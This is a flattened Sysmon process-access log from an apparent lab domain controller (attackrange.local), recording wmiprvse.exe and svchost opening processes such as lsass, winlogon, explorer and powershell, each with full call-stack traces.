15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.881{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.866{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 